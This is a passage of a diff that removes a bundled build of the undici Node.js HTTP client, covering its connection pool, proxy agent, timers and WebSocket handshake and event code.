- -class FixedCircularBuffer { - constructor() { - this.bottom = 0; - this.top = 0; - this.list = new Array(kSize); - this.next = null; - } - - isEmpty() { - return this.top === this.bottom; - } - - isFull() { - return ((this.top + 1) & kMask) === this.bottom; - } - - push(data) { - this.list[this.top] = data; - this.top = (this.top + 1) & kMask; - } - - shift() { - const nextItem = this.list[this.bottom]; - if (nextItem === undefined) - return null; - this.list[this.bottom] = undefined; - this.bottom = (this.bottom + 1) & kMask; - return nextItem; - } -} - -module.exports = class FixedQueue { - constructor() { - this.head = this.tail = new FixedCircularBuffer(); - } - - isEmpty() { - return this.head.isEmpty(); - } - - push(data) { - if (this.head.isFull()) { - // Head is full: Creates a new queue, sets the old queue's `.next` to it, - // and sets it as the new main queue. - this.head = this.head.next = new FixedCircularBuffer(); - } - this.head.push(data); - } - - shift() { - const tail = this.tail; - const next = tail.shift(); - if (tail.isEmpty() && tail.next !== null) { - // If there is another queue, it forms the new tail. 
- this.tail = tail.next; - } - return next; - } -}; - - -/***/ }), - -/***/ 3198: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const DispatcherBase = __nccwpck_require__(4839) -const FixedQueue = __nccwpck_require__(8266) -const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) -const PoolStats = __nccwpck_require__(9689) - -const kClients = Symbol('clients') -const kNeedDrain = Symbol('needDrain') -const kQueue = Symbol('queue') -const kClosedResolve = Symbol('closed resolve') -const kOnDrain = Symbol('onDrain') -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kGetDispatcher = Symbol('get dispatcher') -const kAddClient = Symbol('add client') -const kRemoveClient = Symbol('remove client') -const kStats = Symbol('stats') - -class PoolBase extends DispatcherBase { - constructor () { - super() - - this[kQueue] = new FixedQueue() - this[kClients] = [] - this[kQueued] = 0 - - const pool = this - - this[kOnDrain] = function onDrain (origin, targets) { - const queue = pool[kQueue] - - let needDrain = false - - while (!needDrain) { - const item = queue.shift() - if (!item) { - break - } - pool[kQueued]-- - needDrain = !this.dispatch(item.opts, item.handler) - } - - this[kNeedDrain] = needDrain - - if (!this[kNeedDrain] && pool[kNeedDrain]) { - pool[kNeedDrain] = false - pool.emit('drain', origin, [pool, ...targets]) - } - - if (pool[kClosedResolve] && queue.isEmpty()) { - Promise - .all(pool[kClients].map(c => c.close())) - .then(pool[kClosedResolve]) - } - } - - this[kOnConnect] = (origin, targets) => { - pool.emit('connect', origin, [pool, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - pool.emit('disconnect', origin, [pool, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - 
pool.emit('connectionError', origin, [pool, ...targets], err) - } - - this[kStats] = new PoolStats(this) - } - - get [kBusy] () { - return this[kNeedDrain] - } - - get [kConnected] () { - return this[kClients].filter(client => client[kConnected]).length - } - - get [kFree] () { - return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length - } - - get [kPending] () { - let ret = this[kQueued] - for (const { [kPending]: pending } of this[kClients]) { - ret += pending - } - return ret - } - - get [kRunning] () { - let ret = 0 - for (const { [kRunning]: running } of this[kClients]) { - ret += running - } - return ret - } - - get [kSize] () { - let ret = this[kQueued] - for (const { [kSize]: size } of this[kClients]) { - ret += size - } - return ret - } - - get stats () { - return this[kStats] - } - - async [kClose] () { - if (this[kQueue].isEmpty()) { - return Promise.all(this[kClients].map(c => c.close())) - } else { - return new Promise((resolve) => { - this[kClosedResolve] = resolve - }) - } - } - - async [kDestroy] (err) { - while (true) { - const item = this[kQueue].shift() - if (!item) { - break - } - item.handler.onError(err) - } - - return Promise.all(this[kClients].map(c => c.destroy(err))) - } - - [kDispatch] (opts, handler) { - const dispatcher = this[kGetDispatcher]() - - if (!dispatcher) { - this[kNeedDrain] = true - this[kQueue].push({ opts, handler }) - this[kQueued]++ - } else if (!dispatcher.dispatch(opts, handler)) { - dispatcher[kNeedDrain] = true - this[kNeedDrain] = !this[kGetDispatcher]() - } - - return !this[kNeedDrain] - } - - [kAddClient] (client) { - client - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].push(client) - - if (this[kNeedDrain]) { - process.nextTick(() => { - if (this[kNeedDrain]) { - this[kOnDrain](client[kUrl], [this, client]) - } - }) - } - - return this - } - - 
[kRemoveClient] (client) { - client.close(() => { - const idx = this[kClients].indexOf(client) - if (idx !== -1) { - this[kClients].splice(idx, 1) - } - }) - - this[kNeedDrain] = this[kClients].some(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - } -} - -module.exports = { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} - - -/***/ }), - -/***/ 9689: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) -const kPool = Symbol('pool') - -class PoolStats { - constructor (pool) { - this[kPool] = pool - } - - get connected () { - return this[kPool][kConnected] - } - - get free () { - return this[kPool][kFree] - } - - get pending () { - return this[kPool][kPending] - } - - get queued () { - return this[kPool][kQueued] - } - - get running () { - return this[kPool][kRunning] - } - - get size () { - return this[kPool][kSize] - } -} - -module.exports = PoolStats - - -/***/ }), - -/***/ 4634: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Client = __nccwpck_require__(3598) -const { - InvalidArgumentError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const buildConnector = __nccwpck_require__(2067) - -const kOptions = Symbol('options') -const kConnections = Symbol('connections') -const kFactory = Symbol('factory') - -function defaultFactory (origin, opts) { - return new Client(origin, opts) -} - -class Pool extends PoolBase { - constructor (origin, { - connections, - factory = defaultFactory, - connect, - connectTimeout, - tls, - maxCachedSessions, - socketPath, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - 
allowH2, - ...options - } = {}) { - super() - - if (connections != null && (!Number.isFinite(connections) || connections < 0)) { - throw new InvalidArgumentError('invalid connections') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) - ? options.interceptors.Pool - : [] - this[kConnections] = connections || null - this[kUrl] = util.parseOrigin(origin) - this[kOptions] = { ...util.deepClone(options), connect, allowH2 } - this[kOptions].interceptors = options.interceptors - ? 
{ ...options.interceptors } - : undefined - this[kFactory] = factory - } - - [kGetDispatcher] () { - let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) - - if (dispatcher) { - return dispatcher - } - - if (!this[kConnections] || this[kClients].length < this[kConnections]) { - dispatcher = this[kFactory](this[kUrl], this[kOptions]) - this[kAddClient](dispatcher) - } - - return dispatcher - } -} - -module.exports = Pool - - -/***/ }), - -/***/ 7858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) -const { URL } = __nccwpck_require__(7310) -const Agent = __nccwpck_require__(7890) -const Pool = __nccwpck_require__(4634) -const DispatcherBase = __nccwpck_require__(4839) -const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) - -const kAgent = Symbol('proxy agent') -const kClient = Symbol('proxy client') -const kProxyHeaders = Symbol('proxy headers') -const kRequestTls = Symbol('request tls settings') -const kProxyTls = Symbol('proxy tls settings') -const kConnectEndpoint = Symbol('connect endpoint function') - -function defaultProtocolPort (protocol) { - return protocol === 'https:' ? 443 : 80 -} - -function buildProxyOptions (opts) { - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - return { - uri: opts.uri, - protocol: opts.protocol || 'https' - } -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class ProxyAgent extends DispatcherBase { - constructor (opts) { - super(opts) - this[kProxy] = buildProxyOptions(opts) - this[kAgent] = new Agent(opts) - this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) - ? 
opts.interceptors.ProxyAgent - : [] - - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - const { clientFactory = defaultFactory } = opts - - if (typeof clientFactory !== 'function') { - throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') - } - - this[kRequestTls] = opts.requestTls - this[kProxyTls] = opts.proxyTls - this[kProxyHeaders] = opts.headers || {} - - const resolvedUrl = new URL(opts.uri) - const { origin, port, host, username, password } = resolvedUrl - - if (opts.auth && opts.token) { - throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') - } else if (opts.auth) { - /* @deprecated in favour of opts.token */ - this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` - } else if (opts.token) { - this[kProxyHeaders]['proxy-authorization'] = opts.token - } else if (username && password) { - this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` - } - - const connect = buildConnector({ ...opts.proxyTls }) - this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) - this[kClient] = clientFactory(resolvedUrl, { connect }) - this[kAgent] = new Agent({ - ...opts, - connect: async (opts, callback) => { - let requestedHost = opts.host - if (!opts.port) { - requestedHost += `:${defaultProtocolPort(opts.protocol)}` - } - try { - const { socket, statusCode } = await this[kClient].connect({ - origin, - port, - path: requestedHost, - signal: opts.signal, - headers: { - ...this[kProxyHeaders], - host - } - }) - if (statusCode !== 200) { - socket.on('error', () => {}).destroy() - callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) - } - if (opts.protocol !== 'https:') { - callback(null, socket) - return - } - let servername - if 
(this[kRequestTls]) { - servername = this[kRequestTls].servername - } else { - servername = opts.servername - } - this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) - } catch (err) { - callback(err) - } - } - }) - } - - dispatch (opts, handler) { - const { host } = new URL(opts.origin) - const headers = buildHeaders(opts.headers) - throwIfProxyAuthIsSent(headers) - return this[kAgent].dispatch( - { - ...opts, - headers: { - ...headers, - host - } - }, - handler - ) - } - - async [kClose] () { - await this[kAgent].close() - await this[kClient].close() - } - - async [kDestroy] () { - await this[kAgent].destroy() - await this[kClient].destroy() - } -} - -/** - * @param {string[] | Record} headers - * @returns {Record} - */ -function buildHeaders (headers) { - // When using undici.fetch, the headers list is stored - // as an array. - if (Array.isArray(headers)) { - /** @type {Record} */ - const headersPair = {} - - for (let i = 0; i < headers.length; i += 2) { - headersPair[headers[i]] = headers[i + 1] - } - - return headersPair - } - - return headers -} - -/** - * @param {Record} headers - * - * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers - * Nevertheless, it was changed and to avoid a security vulnerability by end users - * this check was created. 
- * It should be removed in the next major version for performance reasons - */ -function throwIfProxyAuthIsSent (headers) { - const existProxyAuth = headers && Object.keys(headers) - .find((key) => key.toLowerCase() === 'proxy-authorization') - if (existProxyAuth) { - throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') - } -} - -module.exports = ProxyAgent - - -/***/ }), - -/***/ 9459: -/***/ ((module) => { - -"use strict"; - - -let fastNow = Date.now() -let fastNowTimeout - -const fastTimers = [] - -function onTimeout () { - fastNow = Date.now() - - let len = fastTimers.length - let idx = 0 - while (idx < len) { - const timer = fastTimers[idx] - - if (timer.state === 0) { - timer.state = fastNow + timer.delay - } else if (timer.state > 0 && fastNow >= timer.state) { - timer.state = -1 - timer.callback(timer.opaque) - } - - if (timer.state === -1) { - timer.state = -2 - if (idx !== len - 1) { - fastTimers[idx] = fastTimers.pop() - } else { - fastTimers.pop() - } - len -= 1 - } else { - idx += 1 - } - } - - if (fastTimers.length > 0) { - refreshTimeout() - } -} - -function refreshTimeout () { - if (fastNowTimeout && fastNowTimeout.refresh) { - fastNowTimeout.refresh() - } else { - clearTimeout(fastNowTimeout) - fastNowTimeout = setTimeout(onTimeout, 1e3) - if (fastNowTimeout.unref) { - fastNowTimeout.unref() - } - } -} - -class Timeout { - constructor (callback, delay, opaque) { - this.callback = callback - this.delay = delay - this.opaque = opaque - - // -2 not in timer list - // -1 in timer list but inactive - // 0 in timer list waiting for time - // > 0 in timer list waiting for time to expire - this.state = -2 - - this.refresh() - } - - refresh () { - if (this.state === -2) { - fastTimers.push(this) - if (!fastNowTimeout || fastTimers.length === 1) { - refreshTimeout() - } - } - - this.state = 0 - } - - clear () { - this.state = -1 - } -} - -module.exports = { - setTimeout (callback, delay, opaque) { - return delay < 
1e3 - ? setTimeout(callback, delay, opaque) - : new Timeout(callback, delay, opaque) - }, - clearTimeout (timeout) { - if (timeout instanceof Timeout) { - timeout.clear() - } else { - clearTimeout(timeout) - } - } -} - - -/***/ }), - -/***/ 5354: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const diagnosticsChannel = __nccwpck_require__(7643) -const { uid, states } = __nccwpck_require__(9188) -const { - kReadyState, - kSentClose, - kByteParser, - kReceivedClose -} = __nccwpck_require__(7578) -const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) -const { CloseEvent } = __nccwpck_require__(2611) -const { makeRequest } = __nccwpck_require__(8359) -const { fetching } = __nccwpck_require__(4881) -const { Headers } = __nccwpck_require__(554) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { kHeadersList } = __nccwpck_require__(2785) - -const channels = {} -channels.open = diagnosticsChannel.channel('undici:websocket:open') -channels.close = diagnosticsChannel.channel('undici:websocket:close') -channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -/** - * @see https://websockets.spec.whatwg.org/#concept-websocket-establish - * @param {URL} url - * @param {string|string[]} protocols - * @param {import('./websocket').WebSocket} ws - * @param {(response: any) => void} onEstablish - * @param {Partial} options - */ -function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { - // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s - // scheme is "ws", and to "https" otherwise. - const requestURL = url - - requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' - - // 2. 
Let request be a new request, whose URL is requestURL, client is client, - // service-workers mode is "none", referrer is "no-referrer", mode is - // "websocket", credentials mode is "include", cache mode is "no-store" , - // and redirect mode is "error". - const request = makeRequest({ - urlList: [requestURL], - serviceWorkers: 'none', - referrer: 'no-referrer', - mode: 'websocket', - credentials: 'include', - cache: 'no-store', - redirect: 'error' - }) - - // Note: undici extension, allow setting custom headers. - if (options.headers) { - const headersList = new Headers(options.headers)[kHeadersList] - - request.headersList = headersList - } - - // 3. Append (`Upgrade`, `websocket`) to request’s header list. - // 4. Append (`Connection`, `Upgrade`) to request’s header list. - // Note: both of these are handled by undici currently. - // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 - - // 5. Let keyValue be a nonce consisting of a randomly selected - // 16-byte value that has been forgiving-base64-encoded and - // isomorphic encoded. - const keyValue = crypto.randomBytes(16).toString('base64') - - // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s - // header list. - request.headersList.append('sec-websocket-key', keyValue) - - // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s - // header list. - request.headersList.append('sec-websocket-version', '13') - - // 8. For each protocol in protocols, combine - // (`Sec-WebSocket-Protocol`, protocol) in request’s header - // list. - for (const protocol of protocols) { - request.headersList.append('sec-websocket-protocol', protocol) - } - - // 9. Let permessageDeflate be a user-agent defined - // "permessage-deflate" extension header value. 
- // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 - // TODO: enable once permessage-deflate is supported - const permessageDeflate = '' // 'permessage-deflate; 15' - - // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to - // request’s header list. - // request.headersList.append('sec-websocket-extensions', permessageDeflate) - - // 11. Fetch request with useParallelQueue set to true, and - // processResponse given response being these steps: - const controller = fetching({ - request, - useParallelQueue: true, - dispatcher: options.dispatcher ?? getGlobalDispatcher(), - processResponse (response) { - // 1. If response is a network error or its status is not 101, - // fail the WebSocket connection. - if (response.type === 'error' || response.status !== 101) { - failWebsocketConnection(ws, 'Received network error or non-101 status code.') - return - } - - // 2. If protocols is not the empty list and extracting header - // list values given `Sec-WebSocket-Protocol` and response’s - // header list results in null, failure, or the empty byte - // sequence, then fail the WebSocket connection. - if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Server did not respond with sent protocols.') - return - } - - // 3. Follow the requirements stated step 2 to step 6, inclusive, - // of the last set of steps in section 4.1 of The WebSocket - // Protocol to validate response. This either results in fail - // the WebSocket connection or the WebSocket connection is - // established. - - // 2. If the response lacks an |Upgrade| header field or the |Upgrade| - // header field contains a value that is not an ASCII case- - // insensitive match for the value "websocket", the client MUST - // _Fail the WebSocket Connection_. 
- if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { - failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') - return - } - - // 3. If the response lacks a |Connection| header field or the - // |Connection| header field doesn't contain a token that is an - // ASCII case-insensitive match for the value "Upgrade", the client - // MUST _Fail the WebSocket Connection_. - if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { - failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') - return - } - - // 4. If the response lacks a |Sec-WebSocket-Accept| header field or - // the |Sec-WebSocket-Accept| contains a value other than the - // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- - // Key| (as a string, not base64-decoded) with the string "258EAFA5- - // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and - // trailing whitespace, the client MUST _Fail the WebSocket - // Connection_. - const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') - const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') - if (secWSAccept !== digest) { - failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') - return - } - - // 5. If the response includes a |Sec-WebSocket-Extensions| header - // field and this header field indicates the use of an extension - // that was not present in the client's handshake (the server has - // indicated an extension not requested by the client), the client - // MUST _Fail the WebSocket Connection_. (The parsing of this - // header field to determine which extensions are requested is - // discussed in Section 9.1.) - const secExtension = response.headersList.get('Sec-WebSocket-Extensions') - - if (secExtension !== null && secExtension !== permessageDeflate) { - failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') - return - } - - // 6. 
If the response includes a |Sec-WebSocket-Protocol| header field - // and this header field indicates the use of a subprotocol that was - // not present in the client's handshake (the server has indicated a - // subprotocol not requested by the client), the client MUST _Fail - // the WebSocket Connection_. - const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') - - if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') - return - } - - response.socket.on('data', onSocketData) - response.socket.on('close', onSocketClose) - response.socket.on('error', onSocketError) - - if (channels.open.hasSubscribers) { - channels.open.publish({ - address: response.socket.address(), - protocol: secProtocol, - extensions: secExtension - }) - } - - onEstablish(response) - } - }) - - return controller -} - -/** - * @param {Buffer} chunk - */ -function onSocketData (chunk) { - if (!this.ws[kByteParser].write(chunk)) { - this.pause() - } -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 - */ -function onSocketClose () { - const { ws } = this - - // If the TCP connection was closed after the - // WebSocket closing handshake was completed, the WebSocket connection - // is said to have been closed _cleanly_. - const wasClean = ws[kSentClose] && ws[kReceivedClose] - - let code = 1005 - let reason = '' - - const result = ws[kByteParser].closingInfo - - if (result) { - code = result.code ?? 1005 - reason = result.reason - } else if (!ws[kSentClose]) { - // If _The WebSocket - // Connection is Closed_ and no Close control frame was received by the - // endpoint (such as could occur if the underlying transport connection - // is lost), _The WebSocket Connection Close Code_ is considered to be - // 1006. - code = 1006 - } - - // 1. 
Change the ready state to CLOSED (3). - ws[kReadyState] = states.CLOSED - - // 2. If the user agent was required to fail the WebSocket - // connection, or if the WebSocket connection was closed - // after being flagged as full, fire an event named error - // at the WebSocket object. - // TODO - - // 3. Fire an event named close at the WebSocket object, - // using CloseEvent, with the wasClean attribute - // initialized to true if the connection closed cleanly - // and false otherwise, the code attribute initialized to - // the WebSocket connection close code, and the reason - // attribute initialized to the result of applying UTF-8 - // decode without BOM to the WebSocket connection close - // reason. - fireEvent('close', ws, CloseEvent, { - wasClean, code, reason - }) - - if (channels.close.hasSubscribers) { - channels.close.publish({ - websocket: ws, - code, - reason - }) - } -} - -function onSocketError (error) { - const { ws } = this - - ws[kReadyState] = states.CLOSING - - if (channels.socketError.hasSubscribers) { - channels.socketError.publish(error) - } - - this.destroy() -} - -module.exports = { - establishWebSocketConnection -} - - -/***/ }), - -/***/ 9188: -/***/ ((module) => { - -"use strict"; - - -// This is a Globally Unique Identifier unique used -// to validate that the endpoint accepts websocket -// connections. 
-// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 -const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -const states = { - CONNECTING: 0, - OPEN: 1, - CLOSING: 2, - CLOSED: 3 -} - -const opcodes = { - CONTINUATION: 0x0, - TEXT: 0x1, - BINARY: 0x2, - CLOSE: 0x8, - PING: 0x9, - PONG: 0xA -} - -const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 - -const parserStates = { - INFO: 0, - PAYLOADLENGTH_16: 2, - PAYLOADLENGTH_64: 3, - READ_DATA: 4 -} - -const emptyBuffer = Buffer.allocUnsafe(0) - -module.exports = { - uid, - staticPropertyDescriptors, - states, - opcodes, - maxUnsigned16Bit, - parserStates, - emptyBuffer -} - - -/***/ }), - -/***/ 2611: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { MessagePort } = __nccwpck_require__(1267) - -/** - * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent - */ -class MessageEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.MessageEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get data () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.data - } - - get origin () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.origin - } - - get lastEventId () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.lastEventId - } - - get source () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.source - } - - get ports () { - webidl.brandCheck(this, MessageEvent) - - if (!Object.isFrozen(this.#eventInit.ports)) { 
- Object.freeze(this.#eventInit.ports) - } - - return this.#eventInit.ports - } - - initMessageEvent ( - type, - bubbles = false, - cancelable = false, - data = null, - origin = '', - lastEventId = '', - source = null, - ports = [] - ) { - webidl.brandCheck(this, MessageEvent) - - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) - - return new MessageEvent(type, { - bubbles, cancelable, data, origin, lastEventId, source, ports - }) - } -} - -/** - * @see https://websockets.spec.whatwg.org/#the-closeevent-interface - */ -class CloseEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.CloseEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get wasClean () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.wasClean - } - - get code () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.code - } - - get reason () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.reason - } -} - -// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface -class ErrorEvent extends Event { - #eventInit - - constructor (type, eventInitDict) { - webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) - - super(type, eventInitDict) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? 
{}) - - this.#eventInit = eventInitDict - } - - get message () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.message - } - - get filename () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.filename - } - - get lineno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.lineno - } - - get colno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.colno - } - - get error () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.error - } -} - -Object.defineProperties(MessageEvent.prototype, { - [Symbol.toStringTag]: { - value: 'MessageEvent', - configurable: true - }, - data: kEnumerableProperty, - origin: kEnumerableProperty, - lastEventId: kEnumerableProperty, - source: kEnumerableProperty, - ports: kEnumerableProperty, - initMessageEvent: kEnumerableProperty -}) - -Object.defineProperties(CloseEvent.prototype, { - [Symbol.toStringTag]: { - value: 'CloseEvent', - configurable: true - }, - reason: kEnumerableProperty, - code: kEnumerableProperty, - wasClean: kEnumerableProperty -}) - -Object.defineProperties(ErrorEvent.prototype, { - [Symbol.toStringTag]: { - value: 'ErrorEvent', - configurable: true - }, - message: kEnumerableProperty, - filename: kEnumerableProperty, - lineno: kEnumerableProperty, - colno: kEnumerableProperty, - error: kEnumerableProperty -}) - -webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.MessagePort -) - -const eventInit = [ - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.MessageEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'data', - converter: webidl.converters.any, - defaultValue: null - }, 
- { - key: 'origin', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lastEventId', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'source', - // Node doesn't implement WindowProxy or ServiceWorker, so the only - // valid value for source is a MessagePort. - converter: webidl.nullableConverter(webidl.converters.MessagePort), - defaultValue: null - }, - { - key: 'ports', - converter: webidl.converters['sequence'], - get defaultValue () { - return [] - } - } -]) - -webidl.converters.CloseEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'wasClean', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'code', - converter: webidl.converters['unsigned short'], - defaultValue: 0 - }, - { - key: 'reason', - converter: webidl.converters.USVString, - defaultValue: '' - } -]) - -webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'message', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'filename', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lineno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'colno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'error', - converter: webidl.converters.any - } -]) - -module.exports = { - MessageEvent, - CloseEvent, - ErrorEvent -} - - -/***/ }), - -/***/ 5444: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxUnsigned16Bit } = __nccwpck_require__(9188) - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -class WebsocketFrameSend { - /** - * @param {Buffer|undefined} data - */ - constructor (data) { - this.frameData = data - this.maskKey = crypto.randomBytes(4) - } - - createFrame (opcode) { - const bodyLength = this.frameData?.byteLength ?? 
